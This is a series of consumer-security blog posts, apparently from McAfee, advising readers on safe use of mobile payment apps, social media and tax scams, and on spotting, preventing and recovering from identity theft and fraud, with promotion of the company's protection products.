There used to be a time when one roommate split the cost of rent with another by writing a check. Who still owns a checkbook these days? Of course, those days are nearly long gone, in large part thanks to “peer to peer” (P2P) mobile payment apps, like Venmo, Zelle, or Cash App. Now with a simple click on an app, you can transfer your friend money for brunch before you even leave the table. Yet for all their convenience, P2P mobile payment apps could cost you a couple of bucks or more if you’re not on the lookout for things like fraud. The good news is that there are some straightforward ways to protect yourself. 

You likely have one of these apps on your phone already. If so, you’re among the many. It’s estimated that 49% of adults in the U.S. use mobile payment apps like these. 

Yet with all those different apps come different policies and protections associated with them. So, if you ever get stuck with a bum charge, it may not always be so easy to get your money back. 

With that, here are seven quick tips for using your P2P mobile payment apps safely.

1. Add extra protection with your face, finger, or PIN. 

In addition to securing your account with a strong password, go into your settings and set up your app to use a PIN code, facial ID, or fingerprint ID. (And make sure you’re locking your phone the same way too.) This provides an additional layer of protection in the event your phone is stolen or lost and someone, other than you, tries to make a payment with it.  

2. Get a request or make a test before you pay in full. 

What’s worse than sending money to the wrong person? When paying a friend for the first time, have them make a payment request for you. This way, you can be sure that you’re sending money to the right person. With the freedom to create account names however one likes, a small typo can end up as a donation to a complete stranger. To top it off, that money could be gone for good! 

Another option is to make a test payment. Sending a small amount to that new account lets both of you know that the routing is right and that a full payment can be made with confidence. 

3. You can’t always issue a “hold” or “stop payment” with mobile payment apps. 

Bye, bye, bye! Unlike some other payment methods, new mobile payment apps don’t have a way to dispute a charge, cancel a payment, or otherwise use some sort of recall or retrieval feature. If anything, this reinforces the thought above—be sure that you’re absolutely making the payment to the right person. 

4. When you can, use your app with a credit card. 

Credit cards offer a couple of clear advantages over debit cards when using them in association with mobile payment apps (and online shopping for that matter too). Essentially, they can protect you better from fraud: 

• Debit cards immediately remove cash from your account when a payment is made, whereas credit card payments appear as charges—which can be contested in the case of fraud. 

• In the U.S., if your credit card is lost or stolen, you can report the loss and you will have no further responsibility for charges you didn’t make. Additionally, liability for each card lost or stolen is $50. Debit cards don’t enjoy these same protections. 

5. Fraudulent charge … lost or stolen card? Report it right away. 

Report any activity like this immediately to your financial institution. Timing can be of the essence in terms of limiting your liabilities and losses. For additional info, check out this article from the Federal Trade Commission (FTC) that outlines what to do if your debit or credit card is stolen and what your liabilities are.  

Also, note the following guidance from the FTC on payment apps: 

“New mobile apps and forms of payment may not provide these same protections. That means it might not always be easy to get your money back if something goes wrong. Make sure you understand the protections and assurances your payment services provider offers with their service.”  

6. Watch out for cybercrooks cashing in on mobile payment app scams. 

It’s sad but true. Crooks are setting up all kinds of scams that use mobile payment apps. A popular one involves creating fake charities or posing as legitimate ones and then asking for funds by mobile payment. To avoid getting scammed, check and see if the charity is legit. The FTC suggests researching resources like Better Business Bureau’s Wise Giving Alliance, Charity Navigator, Charity Watch or,  GuideStar. 

Overall, the FTC further recommends the following to keep yourself from getting scammed: 

• Review the app’s fraud protection policies and understand whether and how you can recover funds if a problem arises. 
• Be wary of any business that only accepts P2P payment apps or pre-paid debit card payments. Consider this a red flag. 
• Never send P2P payments to, or accept payments from, someone you don’t know. 
• Don’t use P2P payment apps for purchasing goods or services. As noted above, you may not get the consumer protections a credit or debit card can offer. 

7. Protect your phone 

With so much of your life on your phone, getting security software installed on it can protect you and the things you keep on your phone. Whether you’re an Android owner or iOS owner, mobile security software can keep your data, shopping, and payments secure. 

The post Avoid Making Costly Mistakes with Your Mobile Payment Apps appeared first on McAfee Blog.

Quizzes and Other Identity Theft Schemes to Avoid on Social Media

Before you take the fun-looking quiz that popped up in your social media feed, think twice. The person holding the answers may be a hacker. 

Where people go, hackers are sure to follow. So it’s no surprise hackers have set up shop on social media. This has been the case for years, yet now social media-based crime is on the rise. Since 2021, total reported losses to this type of fraud reached $2.7 billion. 

Among these losses are cases of identity theft, where criminals use social media to gather personal information and build profiles of potential victims they can target. Just as we discussed in our recent blog, “Can thieves steal identities with only a name and address?” these bits of information are important pieces in the larger jigsaw puzzle that is your overall identity. 

Let’s uncover these scams these crooks use so that you can steer clear and stay safe. 

A quick look at some common social media scams 

Quizzes and surveys 

“What’s your spooky Halloween name?” or “What’s your professional wrestler name?” You’ve probably seen a few of those and similar quizzes in your feed where you use the street you grew up on, your birthdate, your favorite song, and maybe the name of a beloved first pet to cook up a silly name or some other result. Of course, these are pieces of personal information, sometimes the answer to commonly used security questions by banks and other financial institutions. (Like, what was the model of your first car?) With this info in hand, a hacker could attempt to gain access to your accounts.  

Similarly, scammers will also post surveys with the offer of a gift card to a popular retailer. All you have to do is fork over your personal info. Of course, there’s no gift card coming. Meanwhile, that scammer now has some choice pieces of personal info that they can potentially use against you. 

How to avoid them: Simply put, don’t take those quizzes and surveys online. 

Bogus benefits and get-rich-quick schemes  

The list here is long. These include posts and direct messages about phony relief funds, grants, and giveaways—along with bogus business opportunities that run the gamut from thinly veiled pyramid schemes and gifting circles to mystery shopper jobs. What they all have in common is that they’re run by scammers who want your information, money, or both. If this sounds familiar, like those old emails about transferring funds for a prince in some faraway nation, it is. Many of these scams simply made the jump from email to social media platforms. 

How to avoid them: Research any offer, business opportunity, or organization that reaches out to you. A good trick is to do a search of the organization’s name plus the term “scam” or “review” or “complaint” to see if anything sketchy comes up. 

Government imposter scams 

If there’s one government official that scammers like to use to scare you, it’s the tax collector. These scammers will use social media messaging (and other mediums like emails, texts, and phone calls) to pose as an official who’s either demanding back taxes or offering a refund or credit—all of which are bogus and all of which involve you handing over your personal info, money, or both.  

How to avoid them: Delete the message. In the U.S., the IRS and other government agencies will never reach out to you in this way or ask you for your personal information. Likewise, they won’t demand payment via wire transfer, gift cards, or cryptocurrency like Bitcoin. Only scammers will. 

Friends and family imposter scams 

These are far more targeted than the scams listed above because they’re targeted and often rely upon specific information about you and your family. Thanks to social media, scammers can gain access to that info and use it against you. One example is the “grandkid scam” where a hacker impersonates a grandchild and asks a grandparent for money. Similarly, there are family emergency scams where a bad actor sends a message that a family member was in an accident or arrested and needs money quickly. In all, they rely on a phony story that often involves someone close to you who’s in need or trouble. 

How to avoid them: Take a deep breath and confirm the situation. Reach out to the person in question or another friend or family member to see if there really is a concern. Don’t jump to pay right away. 

The romance con  

This is one of the most targeted attacks of all—the con artist who strikes up an online relationship to bilk a victim out of money. Found everywhere from social media sites to dating apps to online forums, this scam involves creating a phony profile and a phony story to go with it. From there, the scammer will communicate several times a day, perhaps talking about their exotic job in some exotic location. They’ll build trust along the way and eventually ask the victim to wire money or purchase gift cards.  

How to avoid them: Bottom line, if someone you’ve never met in person asks you for money online, it’s a good bet that it’s a scam. Don’t do it. 

Protecting yourself from identity theft and scams on social media 

Now with an idea of what the bad actors are up to out there, here’s a quick rundown of things you can do to protect yourself further from the social media scams they’re trying to pull. 

1. Use strict privacy settings. First up, set your social media profile to private so that only approved friends and family members can access it. McAfee’s Social Media Privacy Manager can easily help you do this. This will circulate less of your personal information in public. However, consider anything you do or post on social media as public information. (Plenty of people can still see it, copy it, and pass it along.) Likewise, pare back the information you provide in your profile, like your birthday, the high school you attended, and so on. The less you put out there, the less a scammer can use against you. 
2. Be a skeptic. You could argue that this applies to staying safe online in general. So many scams rely on our innate willingness to share stories, help others, or simply talk about what’s going on in our lives. This willingness could lower your guard when a scammer comes calling. Instead, try to look at the messages you receive beyond face value. Does something seem unusual about the language or request? What could be the motivation behind it? Pausing and considering questions like these could spare some headaches. 
3. Know your friends. How well do you know everyone on your list of friends and followers? Even with your privacy settings set to the max, these people will see what you’re posting online. Being selective about who you invite into that private circle of yours can limit the amount of personal information people have immediate access to via your posts, tweets, and updates. However, if you like having a larger list of friends and followers, be aware that any personal info you share is effectively being broadcast on a small scale—potentially to people you don’t really know well at all. 
4. Follow up. Get a message from a “friend” that seems a little spammy or just plain weird? Or maybe you get something that sounds like an imposter scam, like the ones we outlined above? Follow up with them using another means of communication other than the social media account that sent the message. See what’s really going on.  
5. Look out for each other. Much like following up, looking out for each other means letting friends know about that strange message you received or a friend request from a potentially duplicate account. By speaking up, you may be giving them the first sign that their account (and thus a portion of their identity) has been compromised. Likewise, it also means talking about that online flame with each other, how it’s going, and, importantly if that “special someone” has stooped to asking for money. 

Stay steps ahead of the scams on social media 

Above and beyond what we’ve covered so far, some online protection basics can keep you safer still. Comprehensive online protection software will help you create strong, unique passwords for all your accounts, help you keep from clicking links to malicious sites, and prevent you from downloading malware. Moreover, it can provide you with identity protection services like ours, which keep your personal info private with around-the-clock monitoring of your email addresses and bank accounts with up to $1M of ID theft insurance. 

Together, with some good protection and a sharp eye, you can avoid those identity theft scams floating around on social media—and get back to enjoying time spent online with your true family and friends. 

The post Quizzes and Other Identity Theft Schemes to Avoid on Social Media appeared first on McAfee Blog.

How To Tell The Difference Between Identity Fraud and Identity Theft?

What’s the difference between identity fraud and identity theft? Well, it’s subtle, so much so that it’s easy to use them nearly interchangeably. While both can take a bite out of your wallet, they are different—and knowing the differences can help you understand what’s at stake. 

Let’s start with an overview and a few examples of each. 

Identity fraud is … 

• When someone steals or misuses your personal information to exploit an account or accounts you already have.  
• Examples:  
  • A criminal gets a hold of your debit card information from a data breach and makes purchases with it against your bank account. 
  • A criminal gains access to one of your accounts via a phishing attack and misuses the funds or otherwise misuses the access associated with that account. 

Identity theft is … 

• When someone uses your personal information to open and abuse new accounts or services in your name—or possibly to impersonate you in other ways. 
• Examples: 
  • A criminal uses your personal information to open a new line of credit at a retailer under your name and then makes purchases against the line of credit.  
  • A criminal uses your Social Security Number to create a driver’s license with their likeness but your name and personal information. 

So there’s that subtle difference we mentioned. Identity fraud involves the misuse of an existing account. Identity theft means the theft of your personal information, which is then used to impersonate you in some way, such as opening new accounts in your name. 

Above and beyond those definitions and examples, a couple of real-life examples put the differences in perspective as well. 

Identity fraud in the news 

As for identity fraud, individual cases of fraud don’t always make the headlines, but that’s not to say you won’t hear about it in a couple of different ways.  

The first way may be news stories about data breaches, where hackers gain things like names, emails, and payment information from companies or organizations. That info can then end up in the hands of a fraudster, who then accesses those accounts to drain funds or make purchases.  

On a smaller scale, you may know someone who has had to get a new credit or debit card because theirs was compromised, perhaps by a breach or by mistakenly making a payment through an insecure website or by visiting a phony login page as part of a phishing attack. These can lead to fraud as well. 

Spotting identity fraud and theft (and preventing it too) 

It usually starts with someone saying anything from, “That’s strange …” to “Oh, no!” There’ll be a strange charge on your credit card bill, a piece of mail from a bill collector, or a statement from an account you never opened—just to name a few things. 

With that, I have a few recent blogs that help you spot all kinds of identity crime, along with advice to help keep it from happening to you in the first place: 

• Top Signs of Identity Theft 
• How to Report Identity Theft to Social Security 
• Can Thieves Steal Identities with Only a Name and Address? 
• Quizzes and Other Identity Theft Schemes to Avoid on Social Media 

Keep a sharp eye out 

While there are differences between identity fraud and identity theft, they do share a couple of things in common: you can take steps to prevent them, and you can take steps to limit their impact should you find yourself faced with one or the other.  

The articles called out above will give you the details, yet staying safe begins with vigilance. Check on your accounts and credit reports regularly and really scrutinize what’s happening in them. Consider covering yourself with an identity monitoring solution — and act on anything that looks strange or outright fishy by reporting it to the company or institution in question.  

The post How To Tell The Difference Between Identity Fraud and Identity Theft? appeared first on McAfee Blog.

How to Detect Signs of Identity Theft

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.  

A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation.  

How does identity theft happen in the first place?  

Unfortunately, it can happen in several ways.   

In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).   

In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who are shopping or banking online without the security of a VPN.  

Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to 1 million in 2023. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft:  

• Online ads that direct you to a scammer’s site are designed to steal your information.  
• Malicious websites and apps also steal information when you use them.  
• Social media scams lure you into providing personal information, whether through posts or direct messages.  

However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media.  

What are some signs of identity theft?  

Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include:  

• You start getting mail for accounts that you never opened.   
• Statements or bills stop showing up from your legitimate accounts.  
• You receive authentication messages for accounts you don’t recognize via email, text, or phone.   
• Debt collectors contact you about an account you have no knowledge of.  
• Unauthorized transactions, however large or small, show up in your bank or credit card statements.  
• You apply for credit and get unexpectedly denied.  
• And in extreme cases, you discover that someone else has filed a tax return in your name.  

As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.   

Steps to take if you suspect that you’re the victim of identity theft  

The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take:  

1) Notify the companies and institutions involved  

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.   

2) File a police report  

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well.  

3) Contact the Federal Trade Commission (FTC)  

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.  

4) Place a fraud alert and consider a credit freeze  

You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name.  

A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready.  

5) Dispute any discrepancies in your credit reports  

This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.   

6) Contact the IRS, if needed  

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid by an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them.  

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.  

7) Continue to monitor your credit report, invoices, and statements  

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely.  

Preventing identity theft 

With all the time we spend online as we bank, shop, and simply surf, we create and share all kinds of personal information—information that can get collected and even stolen. The good news is that you can prevent theft and fraud with online protection software, such as McAfee+ Ultimate.  

With McAfee+ Ultimate you can: 

• Monitor your credit activity on all three major credit bureaus to stay on top of unauthorized use.​ 
• Also, monitor the dark web for breaches involving your personal info and notify you if it’s found.​ 
• Lock or freeze your credit file to help prevent accounts from being opened in your name. 
• Remove your personal info from over 40 data broker sites collecting and selling it. 
• Restore your identity with a licensed expert should the unexpected happen.​ 
• Receive $1M identity theft and stolen funds coverage along with additional $25K ransomware coverage. 

​In all, it’s our most comprehensive privacy, identity, and device protection plan, built for a time when we rely so heavily on the internet to go about our day, whether that’s work, play, or simply getting things done. 

Righting the wrongs of identity theft: deep breaths and an even keel  

Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer to any questions you’ll face in the process of restoring your identity will help you see things through.  

Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts.  

The post How to Detect Signs of Identity Theft appeared first on McAfee Blog.

Can Thieves Steal Identities With Only a Name and Address?

Can thieves steal identities with only a name and address?  

In short, the answer is “no.” Which is a good thing, as your name and address are in fact part of the public record. Anyone can get a hold of them. However, because they are public information, they are still tools that identity thieves can use.   

If you think of your identity as a jigsaw puzzle, your name and address are the first two pieces that they can use to build a bigger picture and ultimately put your identity at risk.   

With that, let’s look at some other key pieces of your identity that are associated with your name and address—and what you can do to protect them.  

For starters, this information is so general that it is of little value in and of itself to an identity thief. Yet a determined identity thief can do a bit of legwork and take a few extra steps to use them as a springboard for other scams.  

For example, with your name and address a thief could:  

Research public databases for further pieces of information about you.  

There are volumes of public information that are readily available should someone want to add some more pieces to your identity jigsaw puzzle, such as:  

• How long you’ve lived in your current home, what you paid for it, and what it’s valued at today.  
• If you’re a registered voter and if you voted in a recent election. (Not how you voted, though!)  
• Also, if you’re a veteran or the owner of a cat or dog (through pet licenses).  

In the U.S., the availability of such information will vary from state to state and different levels of government may have different regulations about what information gets filed—in addition to whether and how those reports are made public. Globally, different nations and regions will collect varying amounts of public information and have their own regulations in place as well. More broadly, though, many of these public databases are now online. Consequently, accessing them is easier than the days when getting a hold of that information required an in-person visit to a library or public office.  

Get yet more personal information about you from online data brokers. 

Cybercriminals can gain additional information about you from other online sources, such as data brokers. And data brokerage is a big business, a global economy estimated at $280 billion U.S. dollars a year. What fuels it? Personal information, representing thousands of data points on billions of people scraped from public records, social media, smartphone apps, shopper loyalty cards, third-party sources, and sometimes other data broker sites as well.   

The above-the-board legal intent of data broker sites is to sell that information to advertisers so that they can create highly targeted campaigns based on people’s behaviors, travels, interests, and even political leanings. Others such as law enforcement officials, journalists, and others who are conducting background checks will use them too. 

On the dark side, hackers, scammers, and thieves will buy this information as well, which they can use to commit identity theft and fraud. The thing is, data brokers will sell to anyone. They don’t discriminate.  

Send you phishing attacks and scams by physical mail.  

Phishing attacks aren’t just for email, texts, and direct messages. In fact, thieves are turning to old tricks via old-fashioned physical mail. That includes sending phony offers or impersonating officials of government institutions, all designed to trick you into giving up your personally identifiable information (PII).   

What might that look like in your mailbox? They can take the form of bogus lottery prizes that request bank information for routing (non-existent) winnings. Another favorite of scammers is bogus tax notifications that demand immediate payment. In all, many can look quite convincing at first blush, yet there are ready ways you can spot them. In fact, many of the tips for avoiding these physical mail phishing attacks are the same for avoiding phishing attacks online.   

Redirect your physical mail, essentially committing mail fraud.  

Recently, I’ve seen a few news stories like this where thieves reportedly abuse the change-of-address system with the U.S. Postal Service. Thieves will simply forward your mail to an address of their choosing, which can drop sensitive information like bank and credit card statements in their mailbox. From there, they could potentially have new checks sent to them or perhaps an additional credit card—both of which they can use to drain your accounts and run up your bills.  

The Postal Service has mechanisms in place to prevent this, however. Among these, the Postal Service will send you a physical piece of mail to confirm the forwarding. So, if you ever receive mail from the Postal Service, open it and give it a close look. If you get such a notice and didn’t order the forwarding, visit your local post office to get things straightened out. Likewise, if it seems like you’re missing bills in the mail, that’s another good reason to follow up with your post office and the business in question to see if there have been any changes made in your mail forwarding.   

Protecting your good name (and identity too)  

So while your name and address are out there for practically all to see, they’re largely of little value to an identity thief on their own. But as mentioned above, they are key puzzle pieces to your overall identity. With enough of those other pieces in hand, that’s where an identity thief can cause trouble.  

Other crucial pieces of your identity include:   

Your Social Security Number or tax ID number:  

Let’s start with the biggest one. This is the master key to your identity, as it is one of the most unique identifiers you have. As I covered in my earlier blog on Social Security fraud, a thief can unlock everything from credit history and credit line to tax refunds and medical care with your Social Security or tax ID number. In extreme cases, they can use it to impersonate you for employment, healthcare, and even in the event of an arrest.   

You can protect your Social Security Number by keeping it locked in a safe place (rather than in your wallet) and by providing your number only when absolutely necessary. For more tips on keeping your number safe, drop by that blog on Social Security fraud I mentioned.  

Your passport and driver’s license:  

Thieves have figured out ways of getting around the fact that IDs like these include a photo. They may be able to modify or emulate these documents “well enough” to pull off certain types of fraud, particularly if the people requesting their bogus documents don’t review them with a critical eye.  

Protecting yourself in this case means knowing where these documents are at any time. (With passports, you may want to store those securely like your Social Security or tax ID number.) Also be careful when you share this information, as the identifiers on these documents are highly unique. If you’re uncomfortable with sharing this information, you can ask if other forms of ID might work—or if this information is really needed at all. Also, take a moment to make copies of these documents and store them in a secure place. This can help you provide important info to the proper authorities if they’re lost or stolen.   

Your card and account information:  

With data breaches large and small making the news (and many more that do not), keeping a sharp eye on your accounts is a major part of identity theft prevention. We talk about this topic quite often, and it’s worth another mention because protecting these means protecting yourself from thieves who are after direct access to your finances and more.   

Secure your digital accounts for banking, credit cards, financials, and shopping by using strong, unique passwords for each of your accounts that you change every 60 days. Sound like a lot of work? Let a password manager do it for you, which you can find in comprehensive online protection software. By changing your strong passwords and keeping them unique can help prevent you from becoming a victim if your account information is part of a breach—by the time a crook attempts to use it, you may have changed it and made it out of date.  

Extra steps for extra identity protection   

In addition to protecting the core forms of identity mentioned above, a few other good habits go a long way toward keeping your identity secure.  

1. Install and use online protection software 

By protecting your devices, you protect what’s on them, like your personal information. Comprehensive online protection software can protect your identity in several ways, like creating and managing the strong, unique passwords we talked about and providing further services that monitor and protect your identity—in addition to digital shredders that can permanently remove sensitive documents (simply deleting them won’t do that alone.) Further, it can monitor your identity and monitor your credit, further protecting you from theft and fraud.

2. Shred your stuff 

Identity theft where thieves dig through trash or go “dumpster diving” for literal scraps of personal info in bills and statements, has been an issue for some time. You can prevent it by shredding up any paper medical bills, tax documents, and checks once you’re through with them. Paper shredders are inexpensive, and let’s face it, kind of fun too. Also, if you’re traveling, have a trusted someone collect your mail or have the post office put a temporary hold on your mail. Thieves still poach mail from mailboxes too. 

3. Go paperless

Getting statements online cuts the paper out of the equation and thus removes another thing that a thief can physically steal and possibly use against you. Whether you use electronic statements through your bank, credit card company, medical provider, or insurance company, use a secure password and a secure connection provided by a VPN. Both will make theft of your personal info far tougher on identity thieves. 

4. Use a VPN

A VPN is a Virtual Private Network, a service that protects your data and privacy online. It creates an encrypted tunnel to keep you more anonymous online by masking your IP address, device information, and the data you’re passing along that connection. In this way, it makes it far more difficult for advertisers, data brokers, and bad actors to skim your private information—in addition to shielding your information from crooks and snoops while you’re banking, shopping, or handling any kind of sensitive information online. 

5. Monitor your accounts 

Give your statements a close look each time they come around. While many companies and institutions have fraud detection mechanisms in place, they don’t always catch every instance of fraud. Look out for strange purchases or charges and follow up with your bank or credit card company if you suspect fraud. Even the smallest charge could be a sign that something shady is afoot. 

6. Check your credit report

This is a powerful tool for spotting identity theft. And in many cases, it’s free to do so. In the U.S., the Fair Credit Reporting Act (FCRA) requires the major credit agencies to provide you with a free credit check at least once every 12 months. Canada provides this service, and the UK has options to receive free reports as well, along with several other nations. It’s a great idea to check your credit report, even if you don’t suspect a problem. 

7. Remove your personal data from data broker sites 

If the thought of your personal info being bought and sold puts you off, there’s something you can do about it. Our Personal Data Cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites, and with select products, it can even manage the removal for you. ​

Your name and address are just two pieces of a larger puzzle  

While thieves need more than just your name and address to commit the overwhelming majority of fraud, your name and address are centerpieces of the larger jigsaw puzzle that is your overall identity.   

And the interesting thing is your puzzle gets larger and larger as time goes on. With each new account you create and service that you sign into, that’s one more piece added to the puzzle. Thieves love getting their hands on any pieces they can because with enough of them in place, they can try and pull a fast one in your name. By looking after each piece and knowing what your larger jigsaw puzzle looks like, you can help keep identity thieves out of your business and your life. 

The post Can Thieves Steal Identities With Only a Name and Address? appeared first on McAfee Blog.

How to Spot, and Prevent, the Tax Scams That Target Elders

How to Spot, and Prevent, the Tax Scams That Target Elders

Elder scams cost seniors in the U.S. some $3 billion annually. And tax season adds a healthy sum to that appalling figure.

What makes seniors such a prime target for tax scams? The Federal Bureau of Investigation (FBI) states several factors. For one, elders are typically trusting and polite. Additionally, many own their own home, have some manner of savings, and enjoy the benefits of good credit—all of which make for an ideal victim profile.

Also according to the FBI, elders may be less able or willing to report being scammed because they may not know the exact way in which they were scammed, or they may feel a sense of shame over it, or even some combination of the two. Moreover, being scammed may instill fear that family members will lose confidence in their ability to look after their own affairs.

If there’s one thing that we can do for our elders, it’s help them raise their critical hackles so they can spot these scams and stop them in their tracks, particularly around tax time. With that, let’s see how crooks target elders, what those scams look and feel like, along with the things we can do to keep ourselves and our loved ones from getting stung.

The IRS imposter scam

The phone rings, and an assertive voice admonishes an elder for non-payment of taxes. The readout on the caller ID shows “Internal Revenue Service” or “IRS,” the person cites an IRS badge number, and the victim is told to pay now via a wire transfer or prepaid gift card. The caller even knows the last four digits of their Social Security Number (SSN). This is a scam.

The caller, and the claim of non-payment, are 100 percent bogus. Even with those last four digits of the SSN attempting to add credibility, it’s still bogus. (Chances are, those last four digits were compromised elsewhere and ended up in the hands of the thieves by way of the black market or dark web so that they could use them in scams just like these.)

Some IRS imposter scams take it a step further. Fraudsters will threaten victims with arrest, deportation, or other legal action, like a lien on funds or the suspension of a driver’s license. They’ll make repeated calls as well, sometimes with additional imposters posing as law enforcement as a means of intimidating elders into payment.

The IRS will never threaten you or someone you know in such a way.

In fact, the IRS will never call you to demand payment. Nor will the IRS ever ask you to wire funds or pay with a gift card or prepaid debit card. And if the IRS claims you do owe funds, you will be notified of your rights as a taxpayer and be given the opportunity to make an appeal. If there’s any question about making payments to the IRS, the IRS has specific guidelines as to how to make a payment properly and safely on their official website.

It’s also helpful to know what the IRS will do in the event you owe taxes. In fact, they have an entire page that spells out how to know it’s really the IRS calling or knocking at your door. It’s a quick read and a worthwhile one at that.

In all, the IRS will contact you by mail or in person. Should you get one of these calls, hang up. Then, report it. I’ll include a list of ways you can file a report at the end of the article.

Tax scams and robocalls

Whether it’s a disembodied voice generated by a computer or a scripted message that’s been recorded by a person, robocalls provide scammers with another favorite avenue of attack. The approach is often quite like the phone scam outlined above, albeit less personalized because the attack is a canned robocall. However, robocalls allow crooks to cast a much larger net in the hopes of illegally wresting money away from victims. In effect, they can spam hundreds or thousands of people with one message in the hopes of landing a bite.

While perhaps not as personalized as other imposter scams, they can still create that innate sense of unease of being contacted by the IRS and harangue a victim into dialing a phony call center where they are further pressured into paying by wire or with a prepaid card, just like in other imposter scams. As above, your course of action here is to simply hang up and report it.

IRS email scams and phishing attacks

Here’s another popular attack. An elder gets an unsolicited email from what appears to be the IRS, yet isn’t. The phony email asks them to update or verify their personal or financial information for a payment or refund. The email may also contain an attachment which they are instructed to click and open. Again, all of these are scams.

Going back to what we talked about earlier, that’s not how the IRS will contact you. These are phishing attacks aimed at grifting prized personal and financial information that scammers can use to commit acts of theft or embezzlement. In the case of the attachment, it very well may contain malware that can do further harm to their device, finances, or personal information.

If you receive one of these emails, don’t open it. And certainly don’t open any attachments—which holds true for any unsolicited email you receive with an attachment.

Preventing tax scams from happening

Beyond simply knowing how to spot a possible attack, you can do several things to prevent one from happening in the first place.

Physical security

First let’s start with some good, old-fashioned physical security. You may also want to look into purchasing a locking mailbox. Mail and porch theft are still prevalent, and it’s not uncommon for thieves to harvest personal and financial information by simply lifting it from your mailbox.

Another cornerstone of physical security is shredding paper correspondence that contains personal or financial information, such as bills, medical documents, bank statements and so forth. I suggest investing a few dollars on an actual paper shredder, which are typically inexpensive if you look for a home model. If you have sensitive paper documents in bulk, such as old tax records that you no longer need to save, consider calling upon a professional service that can drive up to your home and do that high volume of shredding for you.

Likewise, consider the physical security of your digital devices. Make sure you lock your smartphones, tablets, and computers with a PIN or password. Losing a device is a terrible strain enough, let alone knowing that the personal and financial information on them could end up in the hands of a crook. Also see if tracking is available on your device. That way, enabling device tracking can help you locate a lost or stolen item.

Digital security

There are plenty of things you can do to protect yourself on the digital front too. Step one is installing comprehensive security software on your devices. This will safeguard you in several ways, such as email filters that will protect you from phishing attacks, features that will warn you of sketchy links and downloads, plus further protection for your identity and privacy—in addition to overall protection from viruses, malware, and other cyberattacks.

Additional features in comprehensive security software that can protect you from tax scams include:

• File encryption, which renders your most sensitive files into digital gibberish without the encryption key to translate them back.
• A digital file shredder that permanently deletes old files from your computer (simply dropping them into the desktop trashcan doesn’t do that—those files can be easily recovered).
• Identity theft protection, which monitors the dark web for your personal info that might have been leaked online and immediately alerts you if you might be at risk of fraud.

